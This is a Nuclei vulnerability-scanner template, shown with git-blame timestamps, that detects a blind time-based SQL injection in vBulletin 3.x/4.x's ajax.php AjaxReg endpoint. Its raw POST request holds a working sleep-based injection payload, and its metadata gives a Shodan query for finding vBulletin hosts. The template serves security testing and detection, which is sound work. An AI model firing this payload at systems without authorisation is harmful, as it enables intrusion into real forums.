nuclei-templates/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2023-11-21 23:36:56 +00:00
id: vbulletin-ajaxreg-sqli
2023-12-06 07:58:36 +00:00
2023-11-21 23:36:56 +00:00
info:
2023-12-21 08:23:53 +00:00
name: vBulletin 3.x / 4.x AjaxReg - SQL Injection
2023-11-21 23:36:56 +00:00
author: MaStErChO
severity: critical
description: |
vBulletin versions 3.x and 4.x suffer from an AjaxReg remote blind SQL injection vulnerability.
reference:
- https://packetstormsecurity.com/files/118703/vBulletin-3.x-4.x-AjaxReg-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 1
2023-12-21 08:23:53 +00:00
verified: true
2023-11-21 23:36:56 +00:00
shodan-query: http.component:"vBulletin"
2023-12-06 07:58:36 +00:00
tags: vbulletin,ajaxreg,sqli
2023-11-21 23:36:56 +00:00
http:
- raw:
- |
POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1
2023-12-06 07:58:36 +00:00
Host: {{Hostname}}
2023-11-21 23:36:56 +00:00
Content-Type: application/x-www-form-urlencoded
undefined&s=&securitytoken=guest
matchers:
- type: dsl
dsl:
- 'duration>=6'
2023-12-21 08:23:53 +00:00
- 'status_code == 200'
- 'contains_any(header, "bb_lastvisit", "bb_sessionhash")'
2023-12-06 07:58:36 +00:00
condition: and